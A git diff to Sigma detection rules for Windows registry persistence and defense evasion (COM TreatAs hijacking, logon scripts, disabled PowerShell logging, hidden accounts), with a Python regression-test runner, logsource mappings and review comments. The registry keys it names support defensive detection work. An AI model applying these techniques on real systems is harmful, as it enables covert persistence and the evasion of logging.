diff --git a/rules/windows/registry/registry_add/registry_add_persistence_com_key_linking.yml b/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking.yml similarity index 70% rename from rules/windows/registry/registry_add/registry_add_persistence_com_key_linking.yml rename to rules/windows/registry/registry_set/registry_set_persistence_com_key_linking.yml index 788fe0c7a..620ca6b2d 100644 --- a/rules/windows/registry/registry_add/registry_add_persistence_com_key_linking.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_com_key_linking.yml @@ -6,26 +6,31 @@ references: - https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ author: Kutepov Anton, oscd.community date: 2019-10-23 -modified: 2023-02-07 +modified: 2025-10-26 tags: - attack.privilege-escalation - attack.persistence - attack.t1546.015 logsource: - category: registry_add + category: registry_set product: windows detection: selection: - EventType: 'CreateKey' # Don't want DeleteKey events TargetObject|contains|all: - 'HKU\' - 'Classes\CLSID\' - '\TreatAs' - filter_svchost: + filter_main_svchost: # Example of target object by svchost # TargetObject: HKU\S-1-5-21-1098798288-3663759343-897484398-1001_Classes\CLSID\{0003000A-0000-0000-C000-000000000046}\TreatAs Image: 'C:\WINDOWS\system32\svchost.exe' - condition: selection and not 1 of filter_* + condition: selection and not 1 of filter_main_* falsepositives: - Maybe some system utilities in rare cases use linking keys for backward compatibility level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml +simulation: + - type: atomic-red-team + name: COM hijacking via TreatAs + technique: T1546.015 + atomic_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9 
diff --git a/rules/windows/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml b/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml similarity index 71% rename from rules/windows/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml rename to rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml index b112c18e0..634d44626 100644 --- a/rules/windows/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml +++ b/rules/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript.yml @@ -6,20 +6,25 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md author: Tom Ueltschi (@c_APT_ure) date: 2019-01-12 -modified: 2023-06-09 +modified: 2025-10-26 tags: - attack.privilege-escalation - attack.t1037.001 - attack.persistence - attack.lateral-movement logsource: - category: registry_add + category: registry_set product: windows detection: selection: - EventType: CreateKey TargetObject|contains: 'UserInitMprLogonScript' condition: selection falsepositives: - Investigate the contents of the "UserInitMprLogonScript" value to determine of the added script is legitimate level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml +simulation: + - type: atomic-red-team + name: Logon Scripts + technique: T1037.001 + atomic_guid: d6042746-07d4-4c92-9ad8-e644c114a231 diff --git a/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml b/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml index b86391a83..55ca978dc 100644 --- a/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml 
+++ b/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml @@ -10,6 +10,8 @@ modified: 2023-08-17 tags: - attack.defense-evasion - attack.t1564.001 + - attack.t1112 + - attack.persistence logsource: category: registry_set product: windows @@ -30,3 +32,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml +simulation: + - type: atomic-red-team + name: Disable PowerShell Logging via Registry + technique: T1112 + atomic_guid: 95b25212-91a7-42ff-9613-124aca6845a8 diff --git a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula.yml similarity index 78% rename from rules/windows/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml rename to rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula.yml index 7266dd352..a0671e152 100644 --- a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml +++ b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula.yml @@ -6,19 +6,19 @@ references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Markus Neis date: 2017-08-28 -modified: 2023-02-07 +modified: 2025-10-26 tags: - attack.resource-development - attack.t1588.002 logsource: product: windows - category: registry_add + category: registry_set detection: selection: - EventType: CreateKey TargetObject|endswith: '\EulaAccepted' condition: selection falsepositives: - Legitimate use of SysInternals tools - Programs that use the same Registry Key level: low +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml 
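Review bot: The added `- attack.persistence` tag is not supported by what this rule detects: disabling PowerShell logging is a defense-evasion action, and T1112 (Modify Registry), the other tag added in this hunk, is itself a defense-evasion technique, which the existing `attack.defense-evasion` tag already expresses. I would keep `- attack.t1112` and drop `- attack.persistence`. The hunk also alters the rule's tags without bumping `modified: 2023-08-17`, which the other rule edits in this commit do.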
diff --git a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml similarity index 91% rename from rules/windows/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml rename to rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml index 5272fa58e..99999b520 100644 --- a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml +++ b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula.yml @@ -11,16 +11,15 @@ references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) date: 2022-08-24 -modified: 2023-02-07 +modified: 2025-10-26 tags: - attack.resource-development - attack.t1588.002 logsource: product: windows - category: registry_add + category: registry_set detection: selection: - EventType: CreateKey TargetObject|contains: # Please add new values while respecting the alphabetical order - '\Active Directory Explorer' @@ -66,3 +65,4 @@ detection: falsepositives: - Unlikely level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml diff --git a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml similarity index 87% rename from rules/windows/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml rename to rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml index 0ab8b80cd..2c3c8b2cb 100644 --- a/rules/windows/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml 
+++ b/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula.yml @@ -11,16 +11,15 @@ references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Nasreddine Bencherchali (Nextron Systems) date: 2022-08-24 -modified: 2023-02-07 +modified: 2025-10-26 tags: - attack.resource-development - attack.t1588.002 logsource: product: windows - category: registry_add + category: registry_set detection: selection: - EventType: CreateKey TargetObject|contains: - '\Active Directory Explorer' - '\Handle' @@ -37,3 +36,4 @@ detection: falsepositives: - Legitimate use of SysInternals tools. Filter the legitimate paths used in your environment level: medium +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml diff --git a/rules/windows/registry/registry_set/registry_set_special_accounts.yml b/rules/windows/registry/registry_set/registry_set_special_accounts.yml index e2cf16462..f14e232b1 100644 --- a/rules/windows/registry/registry_set/registry_set_special_accounts.yml +++ b/rules/windows/registry/registry_set/registry_set_special_accounts.yml @@ -9,7 +9,7 @@ status: test description: Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen. references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ - - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md + - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md#atomic-test-3---create-hidden-user-in-registry author: Nasreddine Bencherchali (Nextron Systems), frack113 date: 2022-07-12 modified: 2023-01-26 
@@ -27,3 +27,9 @@ detection: falsepositives: - Unknown level: high +regression_tests_path: regression_data/windows/registry/registry_set/registry_set_special_accounts/info.yml +simulation: + - type: atomic-red-team + name: Create Hidden User in Registry + technique: T1564.002 + atomic_guid: 173126b7-afe4-45eb-8680-fa9f6400431c diff --git a/rules/windows/sysmon/sysmon_config_modification.yml b/rules/windows/sysmon/sysmon_config_modification.yml index 5e190f95b..e2421d4ac 100644 --- a/rules/windows/sysmon/sysmon_config_modification.yml +++ b/rules/windows/sysmon/sysmon_config_modification.yml @@ -22,3 +22,4 @@ detection: falsepositives: - Legitimate administrative action level: medium +regression_tests_path: regression_data/windows/sysmon/sysmon_config_modification/info.yml diff --git a/tests/regression_tests_runner.py b/tests/regression_tests_runner.py new file mode 100644 index 000000000..04b22daa2 --- /dev/null +++ b/tests/regression_tests_runner.py 
@@ -0,0 +1,566 @@ +"""Run regression tests for Sigma rules based on their regression_tests_path attribute.""" + +import argparse +import json +import os +import subprocess +import sys +from typing import Dict, List + +import yaml + + +def get_absolute_path(base_path: str, relative_path: str) -> str: + """Convert a relative path to an absolute path based on a base path.""" + if os.path.isabs(relative_path): + return relative_path + + # Normalize path separators + relative_path = relative_path.replace("/", os.sep).replace("\\", os.sep) + workspace_root = base_path + while not os.path.exists(os.path.join(workspace_root, relative_path)): + parent = os.path.dirname(workspace_root) + if parent == workspace_root: # Reached filesystem root + break + workspace_root = parent + return os.path.join(workspace_root, relative_path) + + +def load_info_yaml( + regression_tests_path: str, rule_id: str, file_path: str +) -> tuple[List[Dict], List[Dict]]: + """Load and parse the regression test info YAML file.""" + results = [] + missing_files = [] + + if not os.path.exists(regression_tests_path): + missing_files.append( + { + "rule_path": file_path, + "rule_id": rule_id, + "missing_file": regression_tests_path, + "file_type": "regression_tests_path", + } + ) + return results, missing_files + + try: + with open(regression_tests_path, "r", encoding="utf-8") as f: + info_data = yaml.safe_load(f) + + if not info_data or "regression_tests_info" not in info_data: + print(f"Warning: No regression_tests_info found in {regression_tests_path}") + return results, missing_files + + # Extract test data from regression_tests_info + test_data = [] + regression_tests = info_data.get("regression_tests_info", []) + + for test in regression_tests: + if not isinstance(test, dict): + continue + + test_path = get_absolute_path( + os.path.dirname(file_path), test.get("path", "") + ) + + # Check if test file exists + if not os.path.exists(test_path): + missing_files.append( + { + "rule_path": file_path, + 
"rule_id": rule_id, + "missing_file": test_path, + "file_type": "test_file", + "test_name": test.get("name", "Unnamed Test"), + "test_type": test.get("type", "unknown"), + } + ) + + test_data.append( + { + "type": test.get("type", "unknown"), + "path": test_path, + "name": test.get("name", "Unnamed Test"), + "provider": test.get("provider", ""), + } + ) + + if test_data: + results.append( + { + "path": file_path, + "id": rule_id, + "tests": test_data, + } + ) + + except yaml.YAMLError as e: + print(f"Warning: Could not parse info file {regression_tests_path}: {e}") + + return results, missing_files + + +def find_rule_missing_test(rule_data: Dict, file_path: str) -> tuple[bool, List[Dict]]: + """Find missing test files for a single rule based on its data. + + Returns: + skip: True if the rule should be skipped, False otherwise + missing_regression_tests_path: List of dicts with missing regression_tests_path info + + """ + missing_regression_tests_path = [] + rule_id = rule_data.get("id", "unknown") + rule_status = rule_data.get("status", "").lower() + + # Check if rule status requires regression tests + requires_regression_tests = rule_status in ["test", "stable"] + + # Check if rule has regression_tests_path + has_regression_tests_path = "regression_tests_path" in rule_data + + # If rule requires regression tests but doesn't have regression_tests_path + if requires_regression_tests and not has_regression_tests_path: + missing_regression_tests_path.append( + { + "rule_path": file_path, + "rule_id": rule_id, + "status": rule_status, + } + ) + return True, missing_regression_tests_path + + # Skip rules that don't require regression tests + # and don't have regression_tests_path + if not requires_regression_tests and not has_regression_tests_path: + return True, missing_regression_tests_path + return False, missing_regression_tests_path + + +def find_rule_tests(rule_data: Dict, file_path: str) -> tuple[List[Dict], List[Dict]]: + """Find regression tests and missing 
files for a single rule based on its data.""" + results = [] + missing_files = [] + rule_id = rule_data.get("id", "unknown") + + if rule_data and "regression_tests_path" in rule_data: + regression_tests_path = get_absolute_path( + os.path.dirname(file_path), + rule_data.get("regression_tests_path", ""), + ) + + # Load the info.yml file + yml_result, yml_missing_files = load_info_yaml( + regression_tests_path, rule_id, file_path + ) + results.extend(yml_result) + missing_files.extend(yml_missing_files) + return results, missing_files + + +# pylint: disable=too-many-locals +def find_rules_with_tests( + rules_paths: List[str], +) -> tuple[List[Dict], List[Dict], List[Dict]]: + """Find all rules that have a 'regression_tests_path' attribute pointing to test info files. + + Returns: + tuple: (rules_with_tests, missing_files, missing_regression_tests_path) + """ + results = [] + missing_files = [] + missing_regression_tests_path = [] + + for rules_path in rules_paths: + if not os.path.exists(rules_path): + print(f"Warning: Rules path {rules_path} does not exist") + continue + + for root, _, files in os.walk(rules_path): + for file in files: + if not file.endswith(".yml"): + continue + + file_path = os.path.join(root, file) + try: + with open(file_path, "r", encoding="utf-8") as f: + rule_data = yaml.safe_load(f) + + if not rule_data: + continue + + # Check for missing regression_tests_path + skip, missing_test = find_rule_missing_test(rule_data, file_path) + missing_regression_tests_path.extend(missing_test) + if skip: + continue + + # Find tests for the rule + ( + result, + missing_file, + ) = find_rule_tests(rule_data, file_path) + results.extend(result) + missing_files.extend(missing_file) + + except yaml.YAMLError as e: + print(f"Warning: Could not parse {file_path}: {e}") + + return results, missing_files, missing_regression_tests_path + + +def run_evtx_checker( + rule_path: str, + rule_id: str, + test_data: Dict, + evtx_checker_path: str, + thor_config: str, +) -> 
tuple[bool, str]: + """Run evtx-sigma-checker and check if rule ID is in output.""" + evtx_path = test_data["path"] + + # File existence is now checked upfront in find_rules_with_tests + # No need to check again here + + cmd = [ + evtx_checker_path, + "--log-source", + thor_config, + "--evtx-path", + evtx_path, + "--rule-level", + "informational", + "--rule-path", + os.path.dirname(rule_path), + ] + + try: + result = subprocess.run( + cmd, capture_output=True, text=True, timeout=300, check=True + ) + + if result.returncode != 0: + print(f" Warning: evtx-sigma-checker failed: {result.stderr}") + return False, "" + + # Check if rule ID appears in output + output_lines = result.stdout.strip().splitlines() + found_match = False + match_output = "" + + for line in output_lines: + try: + json_obj = json.loads(line) + if json_obj.get("RuleId") == rule_id: + found_match = True + match_output = line + break + except json.JSONDecodeError: + # Skip lines that aren't valid JSON + print(f" Warning: Skipping non-JSON line: {line}") + continue + + return found_match, match_output + + except subprocess.TimeoutExpired: + print(" Timeout: evtx-sigma-checker timed out") + return False, "" + except subprocess.CalledProcessError as e: + print(f" Error running evtx-sigma-checker: {e}") + return False, "" + + +def run_test( + rule_path: str, + rule_id: str, + test_data: Dict, + evtx_checker_path: str, + thor_config: str, +) -> tuple[bool, str]: + """Run a test based on its type.""" + test_type = test_data.get("type", "unknown") + + if test_type == "evtx": + return run_evtx_checker( + rule_path, rule_id, test_data, evtx_checker_path, thor_config + ) + print(f" Warning: Unknown test type '{test_type}', skipping") + return False, "" + + +def parse_arguments() -> argparse.Namespace: + """Parse command-line arguments.""" + parser = argparse.ArgumentParser( + description="Run regression tests for Sigma rules with regression_tests_path" + ) + + parser.add_argument( + "--rules-paths", + 
required=True, + action="extend", + nargs="+", + help="Comma-separated paths to rule directories", + ) + + parser.add_argument( + "--evtx-checker", + help="Path to evtx-sigma-checker binary (required unless using --validate-only)", + ) + + parser.add_argument( + "--thor-config", + help="Path to thor.yml configuration file (required unless using --validate-only)", + ) + + parser.add_argument( + "--validate-only", + action="store_true", + help="Only validate rule status requirements without running tests", + ) + + parser.add_argument( + "--ignore-validation", + action="store_true", + help="Ignore rule status validation requirements", + ) + + parser.add_argument( + "--verbose", + action="store_true", + help="Enable verbose output, showing successful test results as well", + ) + + return parser.parse_args() + + +def init_checks(args: argparse.Namespace) -> None: + """Initialization that checks for functional environment.""" + if args.validate_only: + print("Starting Rule Status Validation...") + else: + print("Starting Regression Tests...") + + # Check required arguments for test execution + if not args.evtx_checker or not args.thor_config: + print( + "Error: --evtx-checker and --thor-config are required unless using --validate-only" + ) + sys.exit(1) + + # Check if evtx-sigma-checker exists + if not os.path.exists(args.evtx_checker): + print(f"Error: evtx-sigma-checker not found at {args.evtx_checker}") + sys.exit(1) + + # Check if THOR config exists + if not os.path.exists(args.thor_config): + print(f"Error: Thor config not found at {args.thor_config}") + sys.exit(1) + print(f"Rules paths: {args.rules_paths}") + + if not args.validate_only: + print(f"EVTX checker: {args.evtx_checker}") + print(f"Thor config: {args.thor_config}") + print() + + +# pylint: disable=too-many-locals +def run_tests( + args: argparse.Namespace, rules_with_tests +) -> tuple[int, int, List[Dict]]: + """Run tests for all rules with test data.""" + total_tests = 0 + passed_tests = 0 + failures = 
[] + for rule_info in rules_with_tests: + rule_path = rule_info["path"] + rule_id = rule_info["id"] + tests = rule_info["tests"] + + if args.verbose: + print(f"\nTesting rule: {rule_id}") + print(f" File: {rule_path}") + + for i, test_data in enumerate(tests): + test_name = test_data.get("name", f"Test {i+1}") + test_type = test_data.get("type", "unknown") + test_path = test_data.get("path", "unknown") + + if args.verbose: + print(f" {test_name} (type: {test_type}): {test_path}") + total_tests += 1 + + success, output = run_test( + rule_path, rule_id, test_data, args.evtx_checker, args.thor_config + ) + + if success: + passed_tests += 1 + if args.verbose: + print(f" ✓ PASS - Match found for Rule ID: {rule_id}\n") + print(f" Output: {output}") + else: + failures.append( + { + "rule_id": rule_id, + "rule_path": rule_path, + "test_name": test_name, + "test_type": test_type, + "test_path": test_path, + "test_number": i + 1, + } + ) + if args.verbose: + print(" ✗ FAIL") + + if args.verbose: + print() + return total_tests, passed_tests, failures + + +def validate_missing_tests( + args: argparse.Namespace, + rules_with_tests: List[Dict], + missing_regression_tests_path: List[Dict], +) -> None: + """Print rules missing regression_tests_path and handle validation.""" + + # Check for missing regression_tests_path in test/stable rules + if missing_regression_tests_path and not args.ignore_validation: + print() + print("-" * 50) + print("RULES MISSING REGRESSION_TESTS_PATH:") + print("-" * 50) + for missing in missing_regression_tests_path: + print(f"Rule: {missing['rule_id']} (status: {missing['status']})") + print(f" File: {missing['rule_path']}") + print() + print("=" * 70) + print( + "Rules with status 'test' or 'stable' must have a 'regression_tests_path' field." 
+ ) + print("Please add regression tests for these rules or change their status.") + print("=" * 70) + print( + f"\nERROR: Found {len(missing_regression_tests_path)} " + "test/stable rule(s) without regression_tests_path." + ) + + sys.exit(1) + elif missing_regression_tests_path and args.ignore_validation: + print( + f"\nWARNING: Found {len(missing_regression_tests_path)} " + "test/stable rule(s) without regression_tests_path (validation ignored)" + ) + print( + "Consider adding regression tests for these rules " + "or changing their status to 'experimental'." + ) + + # If validate-only mode, exit successfully after validation + if args.validate_only: + if args.ignore_validation and missing_regression_tests_path: + print("✅ All rules passed validation (validation ignored)!") + else: + print("✅ All rules passed validation!") + print(f"Found {len(rules_with_tests)} rules with regression tests configured.") + sys.exit(0) + + +def check_missing_test_files(missing_files: List[Dict]) -> None: + """Check for missing test files and print errors if any are found.""" + if not missing_files: + return + + print(f"\nERROR: Found {len(missing_files)} missing file(s):") + print("=" * 60) + + regression_test_files = [ + f for f in missing_files if f["file_type"] == "regression_tests_path" + ] + test_files = [f for f in missing_files if f["file_type"] == "test_file"] + + if regression_test_files: + print(f"\nMISSING REGRESSION TEST INFO FILES ({len(regression_test_files)}):") + print("-" * 50) + for missing in regression_test_files: + print(f"Rule: {missing['rule_id']}") + print(f" File: {missing['rule_path']}") + print(f" Missing: {missing['missing_file']}") + print() + + if test_files: + print(f"\nMISSING TEST DATA FILES ({len(test_files)}):") + print("-" * 50) + for missing in test_files: + print(f"Rule: {missing['rule_id']}") + print(f" File: {missing['rule_path']}") + print(f" Test: {missing['test_name']} (type: {missing['test_type']})") + print(f" Missing: 
{missing['missing_file']}") + print() + + print("=" * 60) + print("Please ensure all referenced files exist before running tests.") + sys.exit(1) + + +def print_summary(total_tests: int, passed_tests: int, failures: List[Dict]) -> None: + """Print a summary of the test results.""" + print("=" * 60) + print("REGRESSION TEST SUMMARY") + print("=" * 60) + print(f"Total tests run: {total_tests}") + print(f"Passed: {passed_tests}") + print(f"Failed: {len(failures)}") + + if total_tests > 0: + success_rate = (passed_tests / total_tests) * 100 + print(f"Success rate: {success_rate:.1f}%") + + # Print failures + if failures: + print(f"\nFAILED TESTS ({len(failures)}):") + print("-" * 40) + for failure in failures: + print(f"Rule: {failure['rule_id']}") + print(f" File: {failure['rule_path']}") + print(f" Test: {failure['test_name']} (type: {failure['test_type']})") + print(f" Path: {failure['test_path']}") + print() + + print("=" * 60) + + +def main(): + """Main function to run regression tests for Sigma rules.""" + args = parse_arguments() + init_checks(args) + + # Find rules with tests + print("Scanning for rules with test data...") + rules_with_tests, missing_files, missing_regression_tests_path = ( + find_rules_with_tests(args.rules_paths) + ) + print(f"Found {len(rules_with_tests)} rules with test data") + + validate_missing_tests(args, rules_with_tests, missing_regression_tests_path) + check_missing_test_files(missing_files) + print() + + if not rules_with_tests: + print("No rules with test data found") + sys.exit(1) + + # Test each rule + print("Running tests...\n") + total_tests, passed_tests, failures = run_tests(args, rules_with_tests) + + print_summary(total_tests, passed_tests, failures) + + # Exit with error code if any tests failed + if failures: + sys.exit(1) + + +if __name__ == "__main__": + main() diff --git a/tests/thor.yml b/tests/thor.yml index 29222a425..d1572c849 100644 --- a/tests/thor.yml +++ b/tests/thor.yml 
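Review bot: In run_evtx_checker the `if result.returncode != 0:` branch is unreachable because `subprocess.run` is called with `check=True`, and the `CalledProcessError` handler prints only `e`, so a failing checker leaves no stderr in the CI log; either drop `check=True` or change the handler to `print(f" Error running evtx-sigma-checker: {e}\n{e.stderr}")`. get_absolute_path keeps climbing parent directories until the relative path exists, so a missing test file is reported under the filesystem root rather than the checkout, and a same-named path in an ancestor directory outside the checkout would be picked up silently; bounding the walk to the repository root (for example stopping once the directory no longer contains the rules path being scanned) would make both cases explicit. The `--rules-paths` help text says "Comma-separated" while `action="extend", nargs="+"` accepts whitespace-separated values; `help="One or more paths to rule directories"` matches the parser. The collapsed hunk does not show whether the `--evtx-checker`/`--thor-config` presence checks in init_checks sit inside the `else` branch; if they are at function level, `--validate-only` without those flags exits with an error despite the help text calling them optional in that mode, which is worth a test.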
@@ -138,7 +138,7 @@ logsources: rewrite: product: windows service: sysmon - registry_delete: + registry_delete_key: category: registry_delete product: windows conditions: @@ -147,6 +147,15 @@ logsources: rewrite: product: windows service: sysmon + registry_delete_value: + category: registry_delete + product: windows + conditions: + EventID: 12 + EventType: DeleteValue + rewrite: + product: windows + service: sysmon registry_set: category: registry_set product: windows
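Review bot: Both `registry_delete_key` and the new `registry_delete_value` declare `category: registry_delete`, so a Sigma rule with that category now maps to two logsource entries (Sysmon EID 12 with `EventType: DeleteKey` versus `DeleteValue`); whether evtx-sigma-checker unions entries that share a category, rather than taking the first or last one, should be confirmed, since a rule relying on DeleteValue events would otherwise still miss them. Renaming `registry_delete` to `registry_delete_key` also changes an entry name that any other configuration referencing it by name would need to follow. A short comment above the pair, `# EID 12 covers CreateKey/DeleteKey/DeleteValue; both entries feed category registry_delete`, would document the intent. The `conditions` of `registry_delete_key` continue outside the first hunk.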